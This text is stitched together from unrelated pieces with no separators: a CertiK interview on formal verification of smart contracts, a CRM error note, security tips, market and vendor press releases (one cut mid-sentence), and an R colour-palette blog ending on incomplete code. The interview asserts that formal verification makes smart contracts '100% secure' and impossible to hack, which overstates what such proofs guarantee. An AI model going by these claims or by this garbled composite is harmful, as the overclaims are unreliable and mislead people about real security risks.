
CertiK Co-founder Gu Ronghui: Formal Verification Delivers 100% Security for Smart Contracts | Jinse Finance Exclusive Interview


The economic value embedded in blockchain technology has long tempted criminals to use every kind of attack to make a quick profit. According to survey data from the security company Carbon Black, roughly USD 1.1 billion worth of digital assets were stolen worldwide in the first half of 2018, and the losses caused by security incidents keep climbing. Blockchain technology and its security problems remain a focus of the industry.

The strength of smart contracts lies in transparency and decentralization, but for that very reason their source code must be fully public. This means that, compared with traditional programs, smart contracts are easier for hackers to attack. Attacking a traditional program is like a closed-book exam: attacking Alibaba's systems, for instance, is entirely black-box, with no way to get near the code. Attacking a smart contract is like an open-book exam: the hacker can work directly against the source code, which greatly lowers the difficulty. Add to this that more and more programs written as smart contracts are being put to commercial use and becoming hubs of digital financial transactions, so the profit to be had from attacking them is more obvious and even offers a certain stickiness, making them more attractive to hackers.

To protect users' interests as far as possible, the industry applies corresponding measures to secure smart contracts. Traditional security measures are mostly testing plus real-time monitoring. Testing requires running the program and feeding it every possible kind of input to check for problems such as integer overflow vulnerabilities. But testing usually cannot cover 100% of the possible situations, so it cannot rule out undetected vulnerabilities. As Dijkstra's famous line puts it: "Testing can only show the presence of bugs, never their absence."

Real-time monitoring means that once the system discovers a vulnerability, it is fixed as quickly as possible with a patch. But blockchain smart contracts are by nature based on consensus and decentralization and are hard to change once deployed, so when a problem appears it is hard to fix it quickly. Testing plus real-time monitoring may be a trustworthy approach in traditional program security, but applied to blockchain it falls short. Smart contracts need protection that essentially reaches 100% security, with no vulnerabilities, before going on-chain; some important contracts involve economic value that is far from trivial, and their security requirements are even stricter. At present, the only technology that can provide smart contracts with such a trustworthy security environment is called formal verification.

Compared with testing and real-time monitoring, formal verification can guarantee on the basis of mathematical logic that a contract has no vulnerabilities. It guarantees the contract at two levels. The first level is security with no vulnerabilities: mathematical reasoning captures every behaviour of the contract and covers every possibility, thereby guaranteeing that the contract has no vulnerabilities. The second level is trustworthiness, that is, openness and transparency: the creator of the contract must not only state which operations it performs, but also prove to everyone that the code really executes that way. A smart contract that has been verified at both levels and proven secure can, as long as its source code does not change in any way, be guaranteed 100% secure with no vulnerabilities and impossible for hackers to break.

CertiK is a provider of security services for smart contracts and the blockchain ecosystem. It uses formal verification to turn a smart contract into a mathematical model and verifies the model through logical reasoning and calculation, thereby proving the smart contract's security. In an exclusive interview with Jinse Finance, CertiK co-founder Gu Ronghui defined formal verification this way: describe the specification in a logical language, then check through rigorous mathematical deduction whether the given code satisfies the specification, thereby proving the security of the smart contract or other blockchain code.



Gu Ronghui, co-founder of CertiK, holds a bachelor's degree from Tsinghua University and a PhD from Yale University, is an assistant professor at Columbia University, and is an expert in formal verification of system software.

Gu explained that formal verification proves mathematically that a program is secure and correct, thereby guaranteeing the completeness of code security at the logical level and perfectly solving the "zero-day vulnerability" problem. The CertiK platform aims to develop a reliable formal verification framework for building a fully trustworthy smart contract and blockchain ecosystem.

CertiK's formal verification technology today derives from its core research result, the hacker-resistant operating system CertiKOS. CertiKOS is a secure system that the two founders spent six years researching and developing, at a cost of over ten million US dollars in research funding. CertiKOS has not only been validated in the commercial market; promotion of its core technology has also begun through research projects at several American universities, and it has drawn attention from Yale University and other parts of the American academic community.

During the design of CertiKOS, the team had already implemented layer-based decomposition and modular verification, a technique that can break a complex smart-contract verification task into smaller, easily verified tasks, which can then be verified in a distributed manner in the CertiK ecosystem. Every kind of proof object can be constructed and encoded into CertiK transactions and then verified by other participants. Moreover, other participants' verification results can be quickly checked and validated by third parties to ensure that the results are genuine and trustworthy.

CertiK therefore aims to serve as a certificate that demonstrates the security and correctness achieved by verified smart contracts, DApps and blockchains themselves.

Gu said CertiK has three major strengths. First, it has a mature formal verification framework and a complete theoretical foundation, able to prove from mathematical principles whether a smart contract program has security risks. Second, it is highly scalable: using smart labels and layered decomposition, CertiK can refine a complex smart contract into separate modules that can be verified in a distributed way, greatly improving the flexibility and efficiency of security verification. Third, CertiK has a high degree of automation: rather than relying on manual review of programs, it completes contract verification automatically through a verification engine and auditing algorithms, depending very little on human effort and turning source code into machine-checkable verification objects to the greatest extent possible.

Given the special security requirements of the blockchain field, formal verification is the solution that blockchain security truly needs in the future. But the technical barrier is very high, and only a handful of teams worldwide can currently offer such services. CertiK has made full use of its technical advantages to gain a head start in the field, has already built up a large number of well-known blockchain industry institutions and clients, and is expected to become the leader in the formal verification niche.

It is understood that CertiK, relying on solid technical strength and innovation capability as an emerging provider of blockchain smart contract and information security services, has reached security cooperation and service promotion agreements with well-known digital currency exchanges at home and abroad such as Binance, Huobi and KuCoin, and has established strategic partnerships with more than ten mainstream public chains such as NEO, Qtum and Ontology (ONT). It has also received strategic funding from Binance Labs, Bitmain, Danhua Capital, Lightspeed China Partners and other well-known institutions.

CertiK's core team members come almost entirely from world-class universities; in Gu's words, it is a company with Ivy League blood. It is good at identifying industry pain points and niche markets, and can rely on its own technical strength to quickly develop products that meet market demand. CertiK's other co-founder, Zhong Shao, came out of the Special Class for the Gifted Young at the University of Science and Technology of China, earned a PhD at Princeton University, and is now chair of the Department of Computer Science and a tenured professor at Yale University. Chief Scientist Vilhelm Sjoberg holds a PhD from the University of Pennsylvania, was a research scientist at Yale University, and is an expert in software verification, programming languages and type systems. Chief Operating Officer Daryl Hok was formerly Vice President of Corporate Development at FiscalNote, where he led the acquisition of CQ Roll Call from The Economist Group. On the engineering side, CertiK has nearly 20 engineers, most of them senior engineers from Google, Facebook and other globally known companies.

Finally, Gu expressed an optimistic outlook for the future of smart contracts: "A smart contract can be seen as the digital version of a traditional contract, putting into practice the idea that code is law. Any party can create one at any application layer, which amounts to implementing, expressing and executing a traditional contract in code. It offers a very fast and effective means of implementation, and I believe the security guarantees it provides will be more transparent and more trustworthy. There will be even broader application scenarios in the future!"


You do not have the necessary privileges to import security roles. Microsoft.Crm ...


Recently after upgrade of our Dynamics 365 CE from 8.2 to 9.1, when the System Administrator tried importing the solution (managed), he got the below error

You do not have the necessary privileges to import security roles. : Microsoft.Crm.CrmSecurityException: SecLib::CheckPrivilege failed. User: e7282250-7d82-e711-80df-1458d0431690, PrivilegeName: prvWriteRole, PrivilegeId: bd123e14-17ba-40f6-8d8b-18f4bffa7e50, Required

The error message is quite strange: we had never seen this error before, and here it was a System Administrator user who was importing.

We tried importing the solution using another System Administrator account, and it worked for that other user.

Hope it helps.

6 Security Mistakes Even the Pros Make



As a security professional, you know how to keep your environment safe and secure from both internal and external threats. But there's a lot to lock down.

It’s easy to overlook seemingly innocuous security items from time to time. How these neglected items affect your company may vary. Sometimes there are serious consequences. Other times, there aren’t any perceivable problems afterward at all ― on the surface, at least.

Here’s a look at a few mistakes that even seasoned ITSec pros tend to bungle from time to time ― and how you can avoid them.

1. Lapses in User Privileges

It is hard to believe, but there are still organizations that don’t manage user permissions by groups. Without a clear hierarchical structure for your Active Directory, you have to manually create users and assign permissions to file shares and other network resources. This is not only unnecessarily tedious, but it is also a huge security risk.

Think about a user who transfers to a new department and does not have their old access to important file shares and other sensitive resources revoked. If the organization gets hit by a cryptovirus or any other virulent malware, the infection could spread like wildfire.

Other common scenarios involve users that are no longer with the company. Again, it’s hard to believe, but sometimes ex-users are not removed from the systems within the business. Dormant accounts are sought out by crafty hackers who can infiltrate your network from a seemingly innocuous account. If such accounts have admin access or other elevated permissions, the potential damage is virtually unlimited.

2. Weak Password Policies

Think about default logins for your network appliances such as routers and switches. A curious intruder won’t take very long to cycle through all of the most commonly used passwords in order to gain access to your systems.

One remedy is to ditch the default passwords and bulk up on security by following at least the bare minimum security standard. Do you have any lockout policies in place? If you don’t, then people that are trying to guess your credentials can try until the cows come home.

Use a low number of login attempts before an account gets locked out. Some IT pros prefer three tries, others a little more. If you don't have a lockout policy in place, then you should think about implementing one as soon as possible. Remember, you can't always count on your end users.

3. UAC aka User Account Controls

As annoying as it is, the User Account Control dialog that pops up in Windows 7, 8, and 10 actually works. It blocks rogue applications from running amok on your computer by prompting you to accept the changes that an application is trying to make to your system.

Sometimes, you are actually trying to make changes to your system and the UAC popup gets a little annoying. But it is a small price to pay for added security.

4. No Reporting or Monitoring

Just because your systems are up and running doesn’t mean there aren’t problems. You should have an automated reporting routine set up for daily, weekly, and monthly summaries. It’s important to know how appliances, such as firewalls and routers, are working. It’s tempting to dismiss these reports, but they can make your life a lot easier.

These reports give you a heads up if there were any intrusion attempts or if any suspicious activity is occurring on specific interfaces. Suspicious behavior could be malware or viruses. If you don’t check up on these reports then you won’t know what’s going on. If you don’t have any reports set up, then you really don’t know what’s going on.

Critical servers on your network or in the cloud also need to be monitored. As an administrator, you should never be the last to know about a server going offline. This further drives home the need for active monitoring.

Monitoring solutions will send you alerts as soon as anything goes offline. This enables you to start the troubleshooting process from the moment a machine drops off the network. You can use out-of-the-box solutions, either paid or free. Or, if you are feeling especially creative, you can write your own in PowerShell or Bash.

5. Ignoring Best Practices/Compliance Recommendations

If you take the time to perform a security audit, don’t treat it as just another thing to cross off your to-do list. Take the time to review the audit, and whatever you do, don’t ignore recommendations. Put every one of them into action ― no matter how small they may seem.

Ignoring recommendations, especially from a security specialist, is not something you want to do, no matter how redundant (or tedious) the action sounds. If you are unclear about something, swallow your pride and ask the auditor. Recommendations and best practices are there for a reason, so follow them. If not, you risk not being in compliance, especially if you work in a heavily regulated sector like finance or healthcare.

Make sure that you have a documented IT security policy for your department ― one that spells out the bare minimum requirements for your network setup. Minimum password complexity requirements, password attempt lockouts, and set password expiration timelines are all basic security principles that must be followed.

6. No Investment in Training

It’s pretty hard to combat threats if you don’t have the necessary skills. Because hackers are getting more creative and sophisticated, you need to know the latest security trends and best practices. But all too often, it’s easy to put off training. Or worse, not train at all.

If you want to stay ahead of cybercriminals and thwart potential attacks, you need training. While you’re at it, why not get certified? It demonstrates your commitment to ITsec and keeping your skills up to date. Because IT security is paramount to every org, there’s a heavy demand for certified IT pros.

There are entry-level certs like CompTIA Security+. A step above that could be CCNA Cyber Ops. Yeah, there's a lot of ITsec training out there, so it's a mistake not to take advantage of it. Don't be one of those shops that neglects training. We get it, it's easy to neglect when you're running around putting out end-user fires. But it's a mistake you can't afford to make.

The Bottom Line

Everyone makes mistakes, so don't beat yourself up too much if you are guilty of any of the items on the list above. Working with sensitive and valuable information means your systems are bound to attract the wrong kind of attention at some point; it's just a question of when.

As you hustle to keep your organization's data safe, don't forget about the seemingly unimportant small stuff. If you do, you could soon be sweating big time over the small stuff. The good news is that a lot of these trip-ups are easy to avoid and don't take long to address, so be sure to revise your security policies today. You'll thank yourself later.

Crowdsourced Security Global Market Outlook (2017-2026) ResearchAndMarkets ...

DUBLIN (BUSINESS WIRE) The "Crowdsourced Security Global Market Outlook (2017-2026)" report has been added to ResearchAndMarkets.com's offering.


According to this report, the Global Crowdsourced Security market is expected to grow at a strong CAGR by 2026.

Some of the key factors such as the increase in cyber-attacks, privacy & data protection and rising threats from hackers are boosting the market growth. However, the huge cost of development is restricting the market growth.

By Type, public crowds registered a considerable market share during the forecast period. Public crowds are crowds of workers who work on tasks or projects for one or more companies, and they are formed through public (open) websites.

Segments Covered

Forms
Crowdsourced Bug Bounty
Gamified Crowdsourcing Technologies
Sharing Intelligence
Collaborating for a Specific Cause
Crowdsourced Penetration Tests
Other Forms

Types
Private Crowds
Public Crowds

Applications
Back Office
Front Office

End-users
Government
Defense
Financial Institutions
Telecom
Banking
Information Technology (IT)
Healthcare
E-Commerce
Education
Retail
Other End Users

What our report offers:
Market share assessments for the regional and country level segments
Market share analysis of the top industry players
Strategic recommendations for the new entrants
Market forecasts for a minimum of 9 years of all the mentioned segments, sub segments and the regional markets
Market Trends (Drivers, Constraints, Opportunities, Threats, Challenges, Investment Opportunities, and recommendations)
Strategic recommendations in key business segments based on the market estimations
Competitive landscaping mapping the key common trends
Company profiling with detailed strategies, financials, and recent developments
Supply chain trends mapping the latest technological advancements

Key Topics Covered

1 Executive Summary

2 Preface

3 Market Trend Analysis

4 Porters Five Force Analysis

5 Global Crowdsourced Security Market, By Form

6 Global Crowdsourced Security Market, By Type

7 Global Crowdsourced Security Market, By Application

8 Global Crowdsourced Security Market, By End User

9 Global Crowdsourced Security Market, By Geography

10 Key Developments

11 Company Profiling

Global App Testing
Rainforest
Crowdsprint
Bugcrowd Inc.
HackerOne Inc.
Synack Inc.
Dentrix Inc.
Bugwolf
Crowdtest
Bugfinder

For more information about this report visit https://www.researchandmarkets.com/research/2t75fv/crowdsourced?w=4

Contacts

ResearchAndMarkets.com
Laura Wood, Senior Press Manager
press@researchandmarkets.com
For E.S.T Office Hours Call 1-917-300-0470
For U.S./CAN Toll Free Call 1-800-526-8630
For GMT Office Hours Call +353-1-416-8900


Cybersecurity Is Underappreciated


There's a new generation of adults who have never experienced life without the internet as we know it. Whether or not their parents gave them access to a phone with internet capabilities, a laptop at home, or even smart home functionality, the internet was still available to them. Generation Z, or whatever kids these days are called, has had unprecedented exposure to technology.

With that exposure comes a habitual desensitization to the real dangers of the internet. Cybersecurity is greatly under-respected by younger generations because of this. Besides, who cares if your buddy has your Netflix password, which just so happens to be the password to three of your other accounts, including your email?

The assumption, often made alongside the label 'millennial', is that they know everything about technology, are on its cutting edge, and are deeply knowledgeable about the next big thing. What most people don't seem to remember is that the millennial generation has members well into their 30s at this point, with memories of slow 56k dial-up modems and concerned parental warnings about the internet as a new and uncharted tool.

After all, you never know who is on the other end of the computer, a risk borne out by the increase in hacking attempts, both successful and thwarted. Facebook, Experian, and Yahoo are just some of the household-name companies that have added their names to an ever-growing list of organisations that have experienced data breaches. The sheer number of breaches suffered worldwide is unprecedented at this point, and from this we can see that cybersecurity is obviously under-respected by internet users.

It's not just computers either: recently, over 3,700 3D printers were left exposed without adequate cybersecurity. The printers, which connect to the internet, become accessible to malicious manipulation. What takes this a step further is that the printers would be remotely accessible to those people, enabling them to purposely overheat printers in order to burn down structures, steal R&D data, and conduct espionage through the printers' built-in cameras. With 3D printers growing in popularity within America, this is an issue not to be taken lightly.

With all these security risks, you may be asking what simple steps you can take to protect yourself online. To ensure your security online, make sure to:

Install antivirus software on your computer
Use different passwords for each login, making sure not to share them
Use two-factor authentication wherever possible
Use different emails for different types of accounts
Turn off the 'save password' feature in your browser

It's unquestionable that we live in a golden age for data sharing; however, with this comes the risk of data breaches and a need to be ever vigilant when it comes to online security. Hopefully, increased awareness of cyber crime and an understanding of online security risks and the steps to counter them will wake a generation up from sleepwalking into cyber crime victimhood.

Channelnomics Recognizes FireEye for Innovation in Machine Learning


FireEye named a winner in the Channelnomics Innovation Awards

MILPITAS, Calif. (BUSINESS WIRE) FireEye, Inc. (NASDAQ: FEYE), the intelligence-led security company, has been named a Channelnomics Innovation Award winner for FireEye Endpoint Security with MalwareGuard.

The Channelnomics Innovation Awards celebrate the contributions of vendors, distributors, and partners bringing innovation, forward-thinking, and excitement to the channel. The awards are completely independent and based solely on innovation and achievement in the North American channel this past year.

Built over the course of two years by FireEye data scientists and real-world incident response testing, MalwareGuard is an advanced, machine learning-based detection and protection engine added to FireEye Endpoint Security in July 2018. By combining the technology, expertise, and intelligence learned over more than 10 years on the frontlines of the world's biggest breaches, MalwareGuard is designed to defend against the known and unknown threats that often bypass traditional security solutions.

"This award is an important marker of the innovations FireEye delivers through the channel," said Chris Carter, VP of channels, Americas at FireEye. "FireEye Endpoint Security includes investigation, detection, and response (EDR) capabilities that are designed to enable partners to analyze and address threats for their clients in a single integrated workflow. As a result, FireEye channel partners are able to create a business around endpoint malware protection, an area where margins have disappeared in the last 10 years."

Carter continued, "By combining our unique frontline knowledge of the adversaries with our in-house machine learning expertise, we've been able to decrease the window of time from discovery, to analysis, and the deployment of protection. This enables partners to reduce risks to their client's data and proprietary information while focusing more of their time on critical areas of their business."

"When we sell FireEye products to our clients, we manage their environment completely," said Steve Cobb, senior technology and security fellow at One Source Communications, a strategic partner for managed Security Services. "The FireEye intelligence that feeds into MalwareGuard, along with the automation of the machine learning, provides a higher level of granularity on alerts and events―making it extremely consistent. When we get an alert, our analysts know it's something they need to take a look at. Paired with other FireEye products, we can see a full timeline of what has happened, which enables us to provide effective prevention, remediation and incident response."

A free trial of FireEye's next-gen Endpoint solution is available from authorized FireEye partners worldwide. Additional product details can be found at www.fireeye.com/endpoint.

More information on becoming a FireEye Fuel partner is available at https://www.fireeye.com/partners.html.

About Channelnomics:

Channelnomics.com is the number one hub for the U.S. channel, providing the most important and in-depth analysis, opinion and news affecting the North American channel and solution provider, distributor and vendor industries.

Channelnomics is a licensed brand of The 2112 Strategy Group, LLC.

About FireEye, Inc.

FireEye is the intelligence-led security company. Working as a seamless, scalable extension of customer security operations, FireEye offers a single platform that blends innovative security technologies, nation-state grade threat intelligence, and world-renowned Mandiant consulting. With this approach, FireEye eliminates the complexity and burden of cyber security for organizations struggling to prepare for, prevent, and respond to cyber attacks. FireEye has over 7,300 customers across 67 countries, including more than 50 percent of the Forbes Global 2000.

2018 FireEye, Inc. All rights reserved. FireEye, Mandiant and MalwareGuard are registered trademarks or trademarks of FireEye, Inc. in the United States and other countries. All other brands, products, or service names are or may be trademarks or service marks of their respective owners.

Contacts

Dan Wire
FireEye, Inc.
dan.wire@fireeye.com
415-895-2101

Jamie Kelly
Channelnomics
James.kelly@incisivemedia.com
+44 (0)20 7484 9938


Cognitive, Plume and Qualcomm Partner With Stanley Black & Decker for Home ...

Partnership signals a major advancement in delivering a truly cognitive and secure smart home

WATERLOO, Ontario (BUSINESS WIRE) Today, Cognitive, Plume and Qualcomm announced their partnership with Stanley in the creation of its ground-breaking Omni security product. Omni's unique capabilities are enabled by Cognitive Systems' Aura WiFi Motion technology, Plume's cognitive service curation platform, OpenSync device software stack, and Qualcomm's advanced Qualcomm Mesh Networking Platform. The result is a self-install security and motion detection system that alerts end users to motion in and around their homes and businesses without the privacy risks, set-up hassles or high costs that come with security cameras and sensors. The collaboration between the four organizations is an unprecedented step towards creating a truly cognitive, smart home or business.

"We are very pleased to be working closely with these great companies and integrating our Aura WiFi Motion software with their solutions. With more than 35 patents granted, we are very well positioned to disrupt the smart home industry by providing motion detection for security applications and elder care, and most notably, the vital context needed to make a truly smart home," said Taj Manku, Co-Founder and CEO at Cognitive Systems. "Our WiFi Motion software stack allows Stanley Black & Decker's Omni to provide motion detection coverage across an entire home or business, without cameras, so that users know their locations and loved ones are safe and secure."

Cognitive Systems' Aura WiFi Motion technology uses unique radio frequency (RF) sensing technology that can "see" and interpret WiFi signals. On top of this RF sensing, Cognitive Systems uses predictive analytics for reliable and accurate detection and localization of motion.

Cognitive's solution integrates with OpenSync, an open source embedded software that allows partners like Cognitive to launch applications to a ready-made audience across millions of homes. OpenSync intelligently processes data collected by Omni in the Plume Cloud and enables new services to be deployed, managed and supported.

"As the IoT landscape changes with more devices and use-cases, customers are increasingly looking for new service providers to enter the home and bring new solutions over-the-top," said Tyson Marian, Chief Commercial Officer at Plume. "Omni is a great example of how we enable partners to provide new WiFi applications and monetize their services leveraging our existing service portfolio to deliver performance and insightful data at scale."

Omni by Stanley Black & Decker will be available for purchase in the summer of 2019. "Our goal is to provide our customers with a security product that provides true peace of mind," said Spencer Maid, Vice President, Breakthrough Innovation at Stanley Black & Decker. "Cognitive Systems' Aura WiFi Motion technology, combined with Adaptive WiFi delivered through Plume's cognitive service curation platform, allows true interoperability between IoT devices to ensure motion is monitored and interpreted effectively, enabling customers to not only protect their homes and businesses, but also keep their privacy intact."

"As evidenced by the rapid proliferation of connected devices in the home over the last few years, consumers are on the precipice of a new era in smart home technology," said Gopi Sirineni, Vice President, Product Management, Qualcomm Technologies, Inc. "We are excited to be working alongside Cognitive Systems, Plume and Stanley Black & Decker as they adopt emerging wireless technologies like RF sensing and mesh networking to deliver these innovative new applications to established industries like home and business security."

For more information on Omni by Stanley Black & Decker, visit Booth 44610 at CES in January 2019. For more details on Cognitive Systems' Aura WiFi Motion, visit https://www.cognitivesystems.com/.

About Cognitive Systems

Cognitive Systems Corp. is on a mission to transform the way WiFi networks are used. Its flagship technology, Aura WiFi Motion, uses wireless signals to detect motion in the home. Aura WiFi Motion harnesses machine learning and predictive analytics to reliably identify and localize motion for home monitoring, remote monitoring and energy management. This patented technology is layered onto existing WiFi networks, without adding any new hardware, to enhance security service provider and router manufacturer offerings.

About Stanley Black & Decker

Stanley Black & Decker is a $13 billion revenue, $20+ billion market capitalization, purpose-driven industrial organization. Stanley Black & Decker has 58,000 employees in more than 60 countries and operates the world's largest tools and storage business, the world's second largest commercial electronic security company, a leading engineered fastening business as well as Oil & Gas and Infrastructure businesses. The company's iconic brands include BLACK+DECKER, Bostitch, CRAFTSMAN, DEWALT, FACOM, Irwin, Lenox, Porter Cable and Stanley. Stanley Black & Decker is a company for the makers and innovators, the craftsmen and the caregivers, and those doing the hard work to make the world a better place. Learn more at www.stanleyblackanddecker.com.

About Plume

Plume is the pioneer of Adaptive WiFi, the world's first self-optimizing WiFi delivering reliable and consistent Internet
Having bit of party with Material Colour Palette


Continuing on with my "slight?" obsession with colours… I love the colours in the "Material Colour Palette". There are various websites that let you grab the colours by clicking, such as this one, but I just wanted a little handy cheat sheet for myself, so I decided to make one using R and my favourite ggplot2.

Getting colours out of image using package “imager”

After a quick search, I came across an image with all the material colours, so the first thing I tried was to get the colours out of the image using imager.

## Load up packages we'll use
library(tidyverse)
library(imager)
library(patchwork)

im <- load.image("https://www.materialui.co/img/material-colors-thumb.png")
#plot(im)

## Convert image to data frame with HSV values
im_hsv <- im %>%
  RGBtoHSV() %>%
  as.data.frame(wide="c") %>%
  rename(h=c.1, s=c.2, v=c.3)

## Convert image to data frame with RGB values
im_rgb <- im %>%
  as.data.frame(wide="c") %>%
  rename(red=c.1, green=c.2, blue=c.3) %>%
  mutate(hexvalue = rgb(red, green, blue))  ## you can create the hex value from the red, green, blue values!

## Might as well convert to grayscale and get luminance.
## I'll use the luminance value later to decide whether to put black text or white text.
im_grayscale <- im %>%
  grayscale() %>%
  as.data.frame() %>%
  rename(luminance=value)

## I want to grab a pixel from about the middle of each cell
mat_color <- im_rgb %>%
  filter(x %in% as.integer(round(seq(1,19)*(400/19))-10) &
         y %in% as.integer(round(seq(1,11)*(225/11))-10) &
         y>10) %>%
  left_join(im_hsv) %>%
  left_join(im_grayscale) %>%
  mutate_at(c("x","y"), dense_rank) %>%
  arrange(x,y)

col_group <- c("red","pink","purple","deep purple","indigo","blue","light blue","cyan","teal","green",
               "light green","lime","yellow","amber","orange","deep orange","brown","grey","blue grey")

## Adding extra info to the table
mat_color <- mat_color %>%
  mutate(hue_group=factor(x, labels=col_group, ordered=T),
         shade = factor(y, labels=c(50,seq(100,900, by=100)), ordered=T))

## I could also save this as a csv file too... :)
#mat_color %>% write_csv("MaterialColour.csv")

Creating Material Colour Palette Cheat Sheet

Now that I have the colours out of the image in a data frame, I can do the fun stuff: plotting!! I should print this on a colour printer and add it to my cheat sheet collection.

I've used the luminance value of each colour to decide whether to place black text or white text over the colour. (I couldn't figure out if there's a good rule to follow, but it seems like luminance does the trick?!)

mat_color %>%
  ggplot(aes(x=hue_group, y=shade)) +  ## I could also use x=x, y=y
  geom_tile(aes(fill=hexvalue), color="white", size=0.1) +  ## I want a very fine white line around each tile.
  scale_fill_identity(guide="none") +
  theme_void(base_family="Roboto Condensed") +
  ## print out colour hue name and shade (about 48% opacity)
  geom_text(aes(label=paste0(hue_group,"-",shade),
                color=ifelse(luminance>0.5,"#000000","#ffffff")),
            family="Roboto Condensed", size=3, vjust=-2, lineheight=0.8, alpha=0.48) +
  ## print out hexvalue - I'll use this the most, so print it less transparent (about 80% opacity)
  geom_text(aes(label=hexvalue,
                color=ifelse(luminance>0.5,"#000000","#ffffff")),
            family="Roboto Condensed", fontface="bold", vjust=0, alpha=0.8) +
  ## print out RGB & HSV (about 67% opacity); channels in red, green, blue order to match the caption
  geom_text(aes(label=paste0("\n(", round(red*255), ",", round(green*255), ",", round(blue*255), ")\n(",
                             round(h), ",", round(s,1), ",", round(v,1), ")"),
                color=ifelse(luminance>0.5,"#000000","#ffffff")),
            family="Roboto Condensed", size=3, vjust=1, lineheight=0.8, alpha=0.67) +
  scale_color_identity() +
  labs(x="", y="", title="", caption="Material Colour Palettes Hexvalue + RGB + HSV")

## I can save as a PNG file too with the line below
#ggsave("MaterialColorCheatSheet.png", width=16, height=9)
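As an added example that is not part of the original post, here is the WCAG 2 contrast-ratio rule for the same black-or-white text decision, written in base R only; the function names and the sample background colours are my own and are not from the post's mat_color table.

```r
## Added example: choose black or white text by WCAG 2 contrast ratio
## rather than by a raw luminance > 0.5 threshold. Base R only.

## sRGB channel value in 0-1 -> linear light (WCAG relative-luminance definition)
srgb_to_linear <- function(c) {
  ifelse(c <= 0.03928, c / 12.92, ((c + 0.055) / 1.055) ^ 2.4)
}

## Relative luminance of "#rrggbb" strings: 0 = black, 1 = white
relative_luminance <- function(hex) {
  rgb01 <- t(col2rgb(hex)) / 255         # one row per colour: r, g, b in 0-1
  lin   <- srgb_to_linear(rgb01)         # keeps the matrix shape
  0.2126 * lin[, 1] + 0.7152 * lin[, 2] + 0.0722 * lin[, 3]
}

## WCAG contrast ratio between two colours (vectorised), always >= 1
contrast_ratio <- function(hex_a, hex_b) {
  la <- relative_luminance(hex_a)
  lb <- relative_luminance(hex_b)
  (pmax(la, lb) + 0.05) / (pmin(la, lb) + 0.05)
}

## Pick the text colour with the higher contrast against each background and
## report whether that choice reaches the WCAG AA minimum of 4.5:1 for normal text.
pick_text_colour <- function(bg_hex) {
  black <- contrast_ratio(bg_hex, "#000000")
  white <- contrast_ratio(bg_hex, "#ffffff")
  data.frame(
    background = bg_hex,
    text       = ifelse(black >= white, "#000000", "#ffffff"),
    ratio      = round(pmax(black, white), 2),
    meets_AA   = pmax(black, white) >= 4.5,
    stringsAsFactors = FALSE
  )
}

## Constructed sample backgrounds (Material red 500, yellow 500, indigo 500, grey 500)
pick_text_colour(c("#f44336", "#ffeb3b", "#3f51b5", "#9e9e9e"))
```

This can disagree with the luminance > 0.5 rule: on Material red 500 (#f44336) the ratio favours black text at roughly 5.7:1 against about 3.7:1 for white, because the WCAG weights put most of the luminance in the green channel.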

More Parrrty Time with Colours…

While plotting the colours in a rectangular grid is good… I thought it would be a lot nicer to plot them as a "Colour Wheel".

# Colour Wheel!
wheel_base <- mat_color %>%
  filter(!hue_group %in% c("brown","grey","blue grey")) %>%  ## exclude the brown, grey and blue grey groups.
  ggplot(aes(x=x, y=y)) +
  geom_tile(aes(fill=hexvalue), color="white", size=0.1) +
  scale_fill_identity(guide="none") +
  coord_polar() +  ## Converting to polar coordinates does the trick!
  theme_void(base_family="Roboto Condensed") +
  labs(caption="Color Wheel using Material Design Colours")

## Just experimenting with smaller strips on each colour tile..
wheel_base_w <- wheel_base +
  geom_tile(fill="#ffffffde", height=0.5, aes(width=v*0.5)) +
  labs(caption="If you were to play white text... \nWhich ones can you see better?")
wheel_base_b <- wheel_base +
  geom_tile(fill="#000000de", height=0.5, aes(width=v*0.5)) +
  labs(caption="If you were to play black text... \nWhich ones can you see better?")

## Using the "patchwork" package I can plot all 3 charts next to each other.
wheel_base + wheel_base_w + wheel_base_b
Having bit of party with Material Colour Palette

I wanted to see if I can find pairs of colour that I like by shuffling the colours on smaller strips for fun too.

## Randomize Y
a <- wheel_base +
  geom_tile(aes(fill=hexvalue, y=sample(y)), width=0.5, height=0.5) +
  labs(caption="Randomness within Hue Group")
b <- wheel_base +
  geom_tile(aes(fill=hexvalue, x=sample(x)), width=0.5, height=0.5) +
  labs(caption="Randomness within Same Shade")

## Random Colour Wheel
c <- wheel_base +
  geom_tile(aes(fill=hexvalue, x=sample(x), y=sample(y, replace=T)), width=0.5, height=0.5) +
  labs(caption="Randomness to see if i spot any pairs I like")

a + b + c
Making Some Flowers with Material Colour Palette

## Just for fun, let's make some flowers with the material colour palette!
flower1 <- mat_color %>%
  arrange(shade, hue_group) %>%
  mutate(t=row_number()) %>%
  ggplot(aes(x=sqrt(t) * cos(t), y=sqrt(t) * sin(t))) +
  geom_point(aes(color=hexvalue, size=luminance)) +
  #geom_text(aes(label=t), family="Avenir") +
  scale_color_identity() +
  coord_fixed() +
  theme_void(base_family="Roboto Condensed") +
  scale_size_continuous(range=c(3, 8), guide="none") +
  labs(caption="Sort by Shade, then Hue Group, Luminance as Size")

## Same spiral, sorted the other way round
flower2 <- mat_color %>%
  arrange(hue_group, shade) %>%
  mutate(t=row_number()) %>%
  ggplot(aes(x=sqrt(t) * cos(t), y=sqrt(t) * sin(t))) +
  geom_point(aes(color=hexvalue, size=luminance)) +
  scale_color_identity() +
  coord_fixed() +
  theme_void(base_family="Roboto Condensed") +
  scale_size_continuous(range=c(3, 8), guide="none") +
  labs(caption="Sort by Hue Group, Then Shade, Luminance as Size")

## ggplot2 shapes run 0-25: 0-14 are hollow, 15-20 are solid, 21-25 take a separate fill.
## Skip 15-20 so every hue group gets an outlined shape drawn in its own colour.
flower3 <- mat_color %>%
  arrange(shade, hue_group) %>%
  mutate(t=row_number()) %>%
  ggplot(aes(x=sqrt(t) * cos(t), y=sqrt(t) * sin(t))) +
  geom_point(aes(color=hexvalue, shape=ifelse(x <= 15, x-1, x+5)), size=3, stroke=1.5) +
  scale_color_identity() +
  coord_fixed() +
  theme_void(base_family="Roboto Condensed") +
  scale_shape_identity() +
  labs(caption="Mapping Hue Groups to Shapes for Fun")

flower1 + flower2 + flower3
One last one for now…

## Final Random Art
mat_color %>%
  ggplot(aes(x=x, y=y)) +
  geom_tile(aes(fill=hexvalue, width=s*10, height=v*10, alpha=luminance)) +
  scale_fill_identity() +
  scale_alpha_continuous(guide="none", range=c(0, 0.6)) +
  theme_void() +
  ## "The End" twice: a slightly offset black copy as a drop shadow, then white on top
